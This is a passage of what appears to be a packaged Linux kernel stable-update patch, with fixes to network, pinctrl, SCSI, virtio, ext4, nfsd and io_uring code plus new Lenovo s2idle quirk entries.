++			      PLA_TCR0, MCU_TYPE_PLA, tmp, sizeof(*tmp),
++			      USB_CTRL_GET_TIMEOUT);
+ 	if (ret > 0)
+ 		ocp_data = (__le32_to_cpu(*tmp) >> 16) & VERSION_MASK;
+ 
+@@ -9825,6 +9826,10 @@ static int rtl8152_probe(struct usb_interface *intf,
+ 
+ out1:
+ 	tasklet_kill(&tp->tx_tl);
++	cancel_delayed_work_sync(&tp->hw_phy_work);
++	if (tp->rtl_ops.unload)
++		tp->rtl_ops.unload(tp);
++	rtl8152_release_firmware(tp);
+ 	usb_set_intfdata(intf, NULL);
+ out:
+ 	free_netdev(netdev);
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 17da42fe605c3..a530f20ee2575 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -95,7 +95,9 @@ static int __must_check smsc95xx_read_reg(struct usbnet *dev, u32 index,
+ 	ret = fn(dev, USB_VENDOR_REQUEST_READ_REGISTER, USB_DIR_IN
+ 		 | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
+ 		 0, index, &buf, 4);
+-	if (ret < 0) {
++	if (ret < 4) {
++		ret = ret < 0 ? ret : -ENODATA;
++
+ 		if (ret != -ENODEV)
+ 			netdev_warn(dev->net, "Failed to read reg index 0x%08x: %d\n",
+ 				    index, ret);
+diff --git a/drivers/nvmem/imx-ocotp.c b/drivers/nvmem/imx-ocotp.c
+index 14284e866f26e..9590a864efd56 100644
+--- a/drivers/nvmem/imx-ocotp.c
++++ b/drivers/nvmem/imx-ocotp.c
+@@ -506,7 +506,7 @@ static const struct ocotp_params imx6sl_params = {
+ };
+ 
+ static const struct ocotp_params imx6sll_params = {
+-	.nregs = 128,
++	.nregs = 80,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+@@ -520,14 +520,14 @@ static const struct ocotp_params imx6sx_params = {
+ };
+ 
+ static const struct ocotp_params imx6ul_params = {
+-	.nregs = 128,
++	.nregs = 144,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+ };
+ 
+ static const struct ocotp_params imx6ull_params = {
+-	.nregs = 64,
++	.nregs = 80,
+ 	.bank_address_words = 0,
+ 	.set_timing = imx_ocotp_set_imx6_timing,
+ 	.ctrl = IMX_OCOTP_BM_CTRL_DEFAULT,
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index a55998ae29fa4..bfcc5c45b8fa5 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -24,7 +24,8 @@ struct lpi_pinctrl {
+ 	char __iomem *tlmm_base;
+ 	char __iomem *slew_base;
+ 	struct clk_bulk_data clks[MAX_LPI_NUM_CLKS];
+-	struct mutex slew_access_lock;
++	/* Protects from concurrent register updates */
++	struct mutex lock;
+ 	const struct lpi_pinctrl_variant_data *data;
+ };
+ 
+@@ -94,9 +95,11 @@ static int lpi_gpio_set_mux(struct pinctrl_dev *pctldev, unsigned int function,
+ 	if (WARN_ON(i == g->nfuncs))
+ 		return -EINVAL;
+ 
++	mutex_lock(&pctrl->lock);
+ 	val = lpi_gpio_read(pctrl, pin, LPI_GPIO_CFG_REG);
+ 	u32p_replace_bits(&val, i, LPI_GPIO_FUNCTION_MASK);
+ 	lpi_gpio_write(pctrl, pin, LPI_GPIO_CFG_REG, val);
++	mutex_unlock(&pctrl->lock);
+ 
+ 	return 0;
+ }
+@@ -202,14 +205,14 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 			if (slew_offset == LPI_NO_SLEW)
+ 				break;
+ 
+-			mutex_lock(&pctrl->slew_access_lock);
++			mutex_lock(&pctrl->lock);
+ 
+ 			sval = ioread32(pctrl->slew_base + LPI_SLEW_RATE_CTL_REG);
+ 			sval &= ~(LPI_SLEW_RATE_MASK << slew_offset);
+ 			sval |= arg << slew_offset;
+ 			iowrite32(sval, pctrl->slew_base + LPI_SLEW_RATE_CTL_REG);
+ 
+-			mutex_unlock(&pctrl->slew_access_lock);
++			mutex_unlock(&pctrl->lock);
+ 			break;
+ 		default:
+ 			return -EINVAL;
+@@ -225,6 +228,7 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+ 	}
+ 
++	mutex_lock(&pctrl->lock);
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -233,6 +237,7 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 	u32p_replace_bits(&val, output_enabled, LPI_GPIO_OE_MASK);
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
++	mutex_unlock(&pctrl->lock);
+ 
+ 	return 0;
+ }
+@@ -432,7 +437,7 @@ int lpi_pinctrl_probe(struct platform_device *pdev)
+ 	pctrl->chip.of_gpio_n_cells = 2;
+ 	pctrl->chip.can_sleep = false;
+ 
+-	mutex_init(&pctrl->slew_access_lock);
++	mutex_init(&pctrl->lock);
+ 
+ 	pctrl->ctrl = devm_pinctrl_register(dev, &pctrl->desc, pctrl);
+ 	if (IS_ERR(pctrl->ctrl)) {
+@@ -454,7 +459,7 @@ int lpi_pinctrl_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_pinctrl:
+-	mutex_destroy(&pctrl->slew_access_lock);
++	mutex_destroy(&pctrl->lock);
+ 	clk_bulk_disable_unprepare(MAX_LPI_NUM_CLKS, pctrl->clks);
+ 
+ 	return ret;
+@@ -466,7 +471,7 @@ int lpi_pinctrl_remove(struct platform_device *pdev)
+ 	struct lpi_pinctrl *pctrl = platform_get_drvdata(pdev);
+ 	int i;
+ 
+-	mutex_destroy(&pctrl->slew_access_lock);
++	mutex_destroy(&pctrl->lock);
+ 	clk_bulk_disable_unprepare(MAX_LPI_NUM_CLKS, pctrl->clks);
+ 
+ 	for (i = 0; i < pctrl->data->npins; i++)
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index e7ece2738de94..3bb60687f2e42 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4513,6 +4513,79 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "21A1"),
+ 		}
+ 	},
++	/* https://bugzilla.kernel.org/show_bug.cgi?id=218024 */
++	{
++		.ident = "V14 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82YT"),
++		}
++	},
++	{
++		.ident = "V14 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83GE"),
++		}
++	},
++	{
++		.ident = "V15 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82YU"),
++		}
++	},
++	{
++		.ident = "V15 G4 AMN",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83CQ"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 14AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82VF"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 15AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82VG"),
++		}
++	},
++	{
++		.ident = "IdeaPad 1 15AMN7",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82X5"),
++		}
++	},
++	{
++		.ident = "IdeaPad Slim 3 14AMN8",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82XN"),
++		}
++	},
++	{
++		.ident = "IdeaPad Slim 3 15AMN8",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82XQ"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index 30184f7b762c1..deed8c909a786 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -221,7 +221,8 @@ manage_start_stop_show(struct device *dev,
+ 
+ 	return sysfs_emit(buf, "%u\n",
+ 			  sdp->manage_system_start_stop &&
+-			  sdp->manage_runtime_start_stop);
++			  sdp->manage_runtime_start_stop &&
++			  sdp->manage_shutdown);
+ }
+ static DEVICE_ATTR_RO(manage_start_stop);
+ 
+@@ -287,6 +288,35 @@ manage_runtime_start_stop_store(struct device *dev,
+ }
+ static DEVICE_ATTR_RW(manage_runtime_start_stop);
+ 
++static ssize_t manage_shutdown_show(struct device *dev,
++				    struct device_attribute *attr, char *buf)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++
++	return sysfs_emit(buf, "%u\n", sdp->manage_shutdown);
++}
++
++static ssize_t manage_shutdown_store(struct device *dev,
++				     struct device_attribute *attr,
++				     const char *buf, size_t count)
++{
++	struct scsi_disk *sdkp = to_scsi_disk(dev);
++	struct scsi_device *sdp = sdkp->device;
++	bool v;
++
++	if (!capable(CAP_SYS_ADMIN))
++		return -EACCES;
++
++	if (kstrtobool(buf, &v))
++		return -EINVAL;
++
++	sdp->manage_shutdown = v;
++
++	return count;
++}
++static DEVICE_ATTR_RW(manage_shutdown);
++
+ static ssize_t
+ allow_restart_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
+@@ -619,6 +649,7 @@ static struct attribute *sd_disk_attrs[] = {
+ 	&dev_attr_manage_start_stop.attr,
+ 	&dev_attr_manage_system_start_stop.attr,
+ 	&dev_attr_manage_runtime_start_stop.attr,
++	&dev_attr_manage_shutdown.attr,
+ 	&dev_attr_protection_type.attr,
+ 	&dev_attr_protection_mode.attr,
+ 	&dev_attr_app_tag_own.attr,
+@@ -3700,8 +3731,10 @@ static void sd_shutdown(struct device *dev)
+ 		sd_sync_cache(sdkp, NULL);
+ 	}
+ 
+-	if (system_state != SYSTEM_RESTART &&
+-	    sdkp->device->manage_system_start_stop) {
++	if ((system_state != SYSTEM_RESTART &&
++	     sdkp->device->manage_system_start_stop) ||
++	    (system_state == SYSTEM_POWER_OFF &&
++	     sdkp->device->manage_shutdown)) {
+ 		sd_printk(KERN_NOTICE, sdkp, "Stopping disk\n");
+ 		sd_start_stop_device(sdkp, 0);
+ 	}
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 1a059b028c501..2eea080298812 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -1176,9 +1176,7 @@ ssize_t vhost_chr_write_iter(struct vhost_dev *dev,
+ 		goto done;
+ 	}
+ 
+-	if ((msg.type == VHOST_IOTLB_UPDATE ||
+-	     msg.type == VHOST_IOTLB_INVALIDATE) &&
+-	     msg.size == 0) {
++	if (msg.type == VHOST_IOTLB_UPDATE && msg.size == 0) {
+ 		ret = -EINVAL;
+ 		goto done;
+ 	}
+diff --git a/drivers/virtio/virtio_balloon.c b/drivers/virtio/virtio_balloon.c
+index 3f78a3a1eb753..aa90bd0199d7e 100644
+--- a/drivers/virtio/virtio_balloon.c
++++ b/drivers/virtio/virtio_balloon.c
+@@ -395,7 +395,11 @@ static inline s64 towards_target(struct virtio_balloon *vb)
+ 	virtio_cread_le(vb->vdev, struct virtio_balloon_config, num_pages,
+ 			&num_pages);
+ 
+-	target = num_pages;
++	/*
++	 * Aligned up to guest page size to avoid inflating and deflating
++	 * balloon endlessly.
++	 */
++	target = ALIGN(num_pages, VIRTIO_BALLOON_PAGES_PER_PAGE);
+ 	return target - vb->num_pages;
+ }
+ 
+diff --git a/drivers/virtio/virtio_mmio.c b/drivers/virtio/virtio_mmio.c
+index dec3cba884586..de1a081089417 100644
+--- a/drivers/virtio/virtio_mmio.c
++++ b/drivers/virtio/virtio_mmio.c
+@@ -614,14 +614,17 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	spin_lock_init(&vm_dev->lock);
+ 
+ 	vm_dev->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(vm_dev->base))
+-		return PTR_ERR(vm_dev->base);
++	if (IS_ERR(vm_dev->base)) {
++		rc = PTR_ERR(vm_dev->base);
++		goto free_vm_dev;
++	}
+ 
+ 	/* Check magic value */
+ 	magic = readl(vm_dev->base + VIRTIO_MMIO_MAGIC_VALUE);
+ 	if (magic != ('v' | 'i' << 8 | 'r' << 16 | 't' << 24)) {
+ 		dev_warn(&pdev->dev, "Wrong magic value 0x%08lx!\n", magic);
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto free_vm_dev;
+ 	}
+ 
+ 	/* Check device version */
+@@ -629,7 +632,8 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 	if (vm_dev->version < 1 || vm_dev->version > 2) {
+ 		dev_err(&pdev->dev, "Version %ld not supported!\n",
+ 				vm_dev->version);
+-		return -ENXIO;
++		rc = -ENXIO;
++		goto free_vm_dev;
+ 	}
+ 
+ 	vm_dev->vdev.id.device = readl(vm_dev->base + VIRTIO_MMIO_DEVICE_ID);
+@@ -638,7 +642,8 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 		 * virtio-mmio device with an ID 0 is a (dummy) placeholder
+ 		 * with no function. End probing now with no error reported.
+ 		 */
+-		return -ENODEV;
++		rc = -ENODEV;
++		goto free_vm_dev;
+ 	}
+ 	vm_dev->vdev.id.vendor = readl(vm_dev->base + VIRTIO_MMIO_VENDOR_ID);
+ 
+@@ -668,6 +673,10 @@ static int virtio_mmio_probe(struct platform_device *pdev)
+ 		put_device(&vm_dev->vdev.dev);
+ 
+ 	return rc;
++
++free_vm_dev:
++	kfree(vm_dev);
++	return rc;
+ }
+ 
+ static int virtio_mmio_remove(struct platform_device *pdev)
+diff --git a/drivers/virtio/virtio_pci_modern_dev.c b/drivers/virtio/virtio_pci_modern_dev.c
+index 869cb46bef960..ccdd41935ed71 100644
+--- a/drivers/virtio/virtio_pci_modern_dev.c
++++ b/drivers/virtio/virtio_pci_modern_dev.c
+@@ -282,7 +282,7 @@ int vp_modern_probe(struct virtio_pci_modern_device *mdev)
+ 	err = -EINVAL;
+ 	mdev->common = vp_modern_map_capability(mdev, common,
+ 				      sizeof(struct virtio_pci_common_cfg), 4,
+-				      0, sizeof(struct virtio_pci_common_cfg),
++				      0, sizeof(struct virtio_pci_modern_common_cfg),
+ 				      NULL, NULL);
+ 	if (!mdev->common)
+ 		goto err_map_common;
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 3c8300e08f412..6ea6b7105fe35 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4022,8 +4022,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	struct ext4_sb_info *sbi = EXT4_SB(ac->ac_sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+ 	int bsbits, max;
+-	ext4_lblk_t end;
+-	loff_t size, start_off;
++	loff_t size, start_off, end;
+ 	loff_t orig_size __maybe_unused;
+ 	ext4_lblk_t start;
+ 	struct ext4_inode_info *ei = EXT4_I(ac->ac_inode);
+@@ -4052,7 +4051,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 
+ 	/* first, let's learn actual file size
+ 	 * given current request is allocated */
+-	size = ac->ac_o_ex.fe_logical + EXT4_C2B(sbi, ac->ac_o_ex.fe_len);
++	size = extent_logical_end(sbi, &ac->ac_o_ex);
+ 	size = size << bsbits;
+ 	if (size < i_size_read(ac->ac_inode))
+ 		size = i_size_read(ac->ac_inode);
+@@ -4131,7 +4130,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	/* check we don't cross already preallocated blocks */
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(pa, &ei->i_prealloc_list, pa_inode_list) {
+-		ext4_lblk_t pa_end;
++		loff_t pa_end;
+ 
+ 		if (pa->pa_deleted)
+ 			continue;
+@@ -4141,8 +4140,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 			continue;
+ 		}
+ 
+-		pa_end = pa->pa_lstart + EXT4_C2B(EXT4_SB(ac->ac_sb),
+-						  pa->pa_len);
++		pa_end = pa_logical_end(EXT4_SB(ac->ac_sb), pa);
+ 
+ 		/* PA must not overlap original request */
+ 		BUG_ON(!(ac->ac_o_ex.fe_logical >= pa_end ||
+@@ -4171,12 +4169,11 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	/* XXX: extra loop to check we really don't overlap preallocations */
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(pa, &ei->i_prealloc_list, pa_inode_list) {
+-		ext4_lblk_t pa_end;
++		loff_t pa_end;
+ 
+ 		spin_lock(&pa->pa_lock);
+ 		if (pa->pa_deleted == 0) {
+-			pa_end = pa->pa_lstart + EXT4_C2B(EXT4_SB(ac->ac_sb),
+-							  pa->pa_len);
++			pa_end = pa_logical_end(EXT4_SB(ac->ac_sb), pa);
+ 			BUG_ON(!(start >= pa_end || end <= pa->pa_lstart));
+ 		}
+ 		spin_unlock(&pa->pa_lock);
+@@ -4407,8 +4404,7 @@ ext4_mb_use_preallocated(struct ext4_allocation_context *ac)
+ 		/* all fields in this condition don't change,
+ 		 * so we can skip locking for them */
+ 		if (ac->ac_o_ex.fe_logical < pa->pa_lstart ||
+-		    ac->ac_o_ex.fe_logical >= (pa->pa_lstart +
+-					       EXT4_C2B(sbi, pa->pa_len)))
++		    ac->ac_o_ex.fe_logical >= pa_logical_end(sbi, pa))
+ 			continue;
+ 
+ 		/* non-extent files can't have physical blocks past 2^32 */
+@@ -4653,8 +4649,11 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 	pa = ac->ac_pa;
+ 
+ 	if (ac->ac_b_ex.fe_len < ac->ac_g_ex.fe_len) {
+-		int new_bex_start;
+-		int new_bex_end;
++		struct ext4_free_extent ex = {
++			.fe_logical = ac->ac_g_ex.fe_logical,
++			.fe_len = ac->ac_g_ex.fe_len,
++		};
++		loff_t orig_goal_end = extent_logical_end(sbi, &ex);
+ 
+ 		/* we can't allocate as much as normalizer wants.
+ 		 * so, found space must get proper lstart
+@@ -4673,29 +4672,23 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		 *    still cover original start
+ 		 * 3. Else, keep the best ex at start of original request.
+ 		 */
+-		new_bex_end = ac->ac_g_ex.fe_logical +
+-			EXT4_C2B(sbi, ac->ac_g_ex.fe_len);
+-		new_bex_start = new_bex_end - EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (ac->ac_o_ex.fe_logical >= new_bex_start)
+-			goto adjust_bex;
++		ex.fe_len = ac->ac_b_ex.fe_len;
+ 
+-		new_bex_start = ac->ac_g_ex.fe_logical;
+-		new_bex_end =
+-			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (ac->ac_o_ex.fe_logical < new_bex_end)
++		ex.fe_logical = orig_goal_end - EXT4_C2B(sbi, ex.fe_len);
++		if (ac->ac_o_ex.fe_logical >= ex.fe_logical)
+ 			goto adjust_bex;
+ 
+-		new_bex_start = ac->ac_o_ex.fe_logical;
+-		new_bex_end =
+-			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		ex.fe_logical = ac->ac_g_ex.fe_logical;
++		if (ac->ac_o_ex.fe_logical < extent_logical_end(sbi, &ex))
++			goto adjust_bex;
+ 
++		ex.fe_logical = ac->ac_o_ex.fe_logical;
+ adjust_bex:
+-		ac->ac_b_ex.fe_logical = new_bex_start;
++		ac->ac_b_ex.fe_logical = ex.fe_logical;
+ 
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+ 		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
+-		BUG_ON(new_bex_end > (ac->ac_g_ex.fe_logical +
+-				      EXT4_C2B(sbi, ac->ac_g_ex.fe_len)));
++		BUG_ON(extent_logical_end(sbi, &ex) > orig_goal_end);
+ 	}
+ 
+ 	/* preallocation can change ac_b_ex, thus we store actually
+@@ -5229,7 +5222,7 @@ static void ext4_mb_group_or_file(struct ext4_allocation_context *ac)
+ 
+ 	group_pa_eligible = sbi->s_mb_group_prealloc > 0;
+ 	inode_pa_eligible = true;
+-	size = ac->ac_o_ex.fe_logical + EXT4_C2B(sbi, ac->ac_o_ex.fe_len);
++	size = extent_logical_end(sbi, &ac->ac_o_ex);
+ 	isize = (i_size_read(ac->ac_inode) + ac->ac_sb->s_blocksize - 1)
+ 		>> bsbits;
+ 
+diff --git a/fs/ext4/mballoc.h b/fs/ext4/mballoc.h
+index dcda2a943cee0..00b3898df4a76 100644
+--- a/fs/ext4/mballoc.h
++++ b/fs/ext4/mballoc.h
+@@ -218,6 +218,20 @@ static inline ext4_fsblk_t ext4_grp_offs_to_block(struct super_block *sb,
+ 		(fex->fe_start << EXT4_SB(sb)->s_cluster_bits);
+ }
+ 
++static inline loff_t extent_logical_end(struct ext4_sb_info *sbi,
++					struct ext4_free_extent *fex)
++{
++	/* Use loff_t to avoid end exceeding ext4_lblk_t max. */
++	return (loff_t)fex->fe_logical + EXT4_C2B(sbi, fex->fe_len);
++}
++
++static inline loff_t pa_logical_end(struct ext4_sb_info *sbi,
++				    struct ext4_prealloc_space *pa)
++{
++	/* Use loff_t to avoid end exceeding ext4_lblk_t max. */
++	return (loff_t)pa->pa_lstart + EXT4_C2B(sbi, pa->pa_len);
++}
++
+ typedef int (*ext4_mballoc_query_range_fn)(
+ 	struct super_block		*sb,
+ 	ext4_group_t			agno,
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 4c11046800ab4..eccc6ce55a63a 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1659,6 +1659,12 @@ nfsd_rename(struct svc_rqst *rqstp, struct svc_fh *ffhp, char *fname, int flen,
+ 	if (!flen || isdotent(fname, flen) || !tlen || isdotent(tname, tlen))
+ 		goto out;
+ 
++	err = (rqstp->rq_vers == 2) ? nfserr_acces : nfserr_xdev;
++	if (ffhp->fh_export->ex_path.mnt != tfhp->fh_export->ex_path.mnt)
++		goto out;
++	if (ffhp->fh_export->ex_path.dentry != tfhp->fh_export->ex_path.dentry)
++		goto out;
++
+ retry:
+ 	host_err = fh_want_write(ffhp);
+ 	if (host_err) {
+@@ -1690,12 +1696,6 @@ retry:
+ 	if (ndentry == trap)
+ 		goto out_dput_new;
+ 
+-	host_err = -EXDEV;
+-	if (ffhp->fh_export->ex_path.mnt != tfhp->fh_export->ex_path.mnt)
+-		goto out_dput_new;
+-	if (ffhp->fh_export->ex_path.dentry != tfhp->fh_export->ex_path.dentry)
+-		goto out_dput_new;
+-
+ 	if ((ndentry->d_sb->s_export_op->flags & EXPORT_OP_CLOSE_BEFORE_UNLINK) &&
+ 	    nfsd_has_cached_files(ndentry)) {
+ 		close_cached = true;
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index 58b53d08f2c8e..e46f6b49eb389 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -70,6 +70,7 @@ struct resv_map {
+ 	long adds_in_progress;
+ 	struct list_head region_cache;
+ 	long region_cache_count;
++	struct rw_semaphore rw_sema;
+ #ifdef CONFIG_CGROUP_HUGETLB
+ 	/*
+ 	 * On private mappings, the counter to uncharge reservations is stored
+@@ -879,6 +880,11 @@ static inline bool hugepage_migration_supported(struct hstate *h)
+ 	return arch_hugetlb_migration_supported(h);
+ }
+ 
++static inline bool __vma_private_lock(struct vm_area_struct *vma)
++{
++	return (!(vma->vm_flags & VM_MAYSHARE)) && vma->vm_private_data;
++}
++
+ /*
+  * Movability check is different as compared to migration check.
+  * It determines whether or not a huge page should be placed on
+diff --git a/include/linux/kasan.h b/include/linux/kasan.h
+index d811b3d7d2a15..6e6f0238d63cc 100644
+--- a/include/linux/kasan.h
++++ b/include/linux/kasan.h
+@@ -471,10 +471,10 @@ static inline void kasan_free_module_shadow(const struct vm_struct *vm) {}
+ 
+ #endif /* (CONFIG_KASAN_GENERIC || CONFIG_KASAN_SW_TAGS) && !CONFIG_KASAN_VMALLOC */
+ 
+-#ifdef CONFIG_KASAN_INLINE
++#ifdef CONFIG_KASAN
+ void kasan_non_canonical_hook(unsigned long addr);
+-#else /* CONFIG_KASAN_INLINE */
++#else /* CONFIG_KASAN */
+ static inline void kasan_non_canonical_hook(unsigned long addr) { }
+-#endif /* CONFIG_KASAN_INLINE */
++#endif /* CONFIG_KASAN */
+ 
+ #endif /* LINUX_KASAN_H */
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index dc2cff18b68bd..5aabc36fb249b 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -162,8 +162,24 @@ struct scsi_device {
+ 				 * core. */
+ 	unsigned int eh_timeout; /* Error handling timeout */
+ 
+-	bool manage_system_start_stop; /* Let HLD (sd) manage system start/stop */
+-	bool manage_runtime_start_stop; /* Let HLD (sd) manage runtime start/stop */
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for system suspend/resume (suspend to RAM and
++	 * hibernation) operations.
++	 */
++	bool manage_system_start_stop;
++
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for runtime device suspand and resume operations.
++	 */
++	bool manage_runtime_start_stop;
++
++	/*
++	 * If true, let the high-level device driver (sd) manage the device
++	 * power state for system shutdown (power off) operations.
++	 */
++	bool manage_shutdown;
+ 
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+diff --git a/include/uapi/linux/gtp.h b/include/uapi/linux/gtp.h
+index 2f61298a7b779..3dcdb9e33cba2 100644
+--- a/include/uapi/linux/gtp.h
++++ b/include/uapi/linux/gtp.h
+@@ -33,6 +33,6 @@ enum gtp_attrs {
+ 	GTPA_PAD,
+ 	__GTPA_MAX,
+ };
+-#define GTPA_MAX (__GTPA_MAX + 1)
++#define GTPA_MAX (__GTPA_MAX - 1)
+ 
+ #endif /* _UAPI_LINUX_GTP_H_ */
+diff --git a/io_uring/fdinfo.c b/io_uring/fdinfo.c
+index 882bd56b01ed0..ea2c2ded4e412 100644
+--- a/io_uring/fdinfo.c
++++ b/io_uring/fdinfo.c
+@@ -51,7 +51,6 @@ static __cold int io_uring_show_cred(struct seq_file *m, unsigned int id,
+ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 					  struct seq_file *m)
+ {
+-	struct io_sq_data *sq = NULL;
+ 	struct io_overflow_cqe *ocqe;
+ 	struct io_rings *r = ctx->rings;
+ 	unsigned int sq_mask = ctx->sq_entries - 1, cq_mask = ctx->cq_entries - 1;
+@@ -62,6 +61,7 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 	unsigned int cq_shift = 0;
+ 	unsigned int sq_shift = 0;
+ 	unsigned int sq_entries, cq_entries;
++	int sq_pid = -1, sq_cpu = -1;
+ 	bool has_lock;
+ 	unsigned int i;
+ 
+@@ -139,13 +139,19 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 	has_lock = mutex_trylock(&ctx->uring_lock);
+ 
+ 	if (has_lock && (ctx->flags & IORING_SETUP_SQPOLL)) {
+-		sq = ctx->sq_data;
+-		if (!sq->thread)
+-			sq = NULL;
++		struct io_sq_data *sq = ctx->sq_data;
++
++		if (mutex_trylock(&sq->lock)) {
++			if (sq->thread) {
++				sq_pid = task_pid_nr(sq->thread);
++				sq_cpu = task_cpu(sq->thread);
++			}
++			mutex_unlock(&sq->lock);
++		}
+ 	}
+ 
+-	seq_printf(m, "SqThread:\t%d\n", sq ? task_pid_nr(sq->thread) : -1);
+-	seq_printf(m, "SqThreadCpu:\t%d\n", sq ? task_cpu(sq->thread) : -1);
++	seq_printf(m, "SqThread:\t%d\n", sq_pid);
++	seq_printf(m, "SqThreadCpu:\t%d\n", sq_cpu);
+ 	seq_printf(m, "UserFiles:\t%u\n", ctx->nr_user_files);
+ 	for (i = 0; has_lock && i < ctx->nr_user_files; i++) {
+ 		struct file *f = io_file_from_index(&ctx->file_table, i);
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 2b8315a948a2c..8f2b9d8b9150e 100644
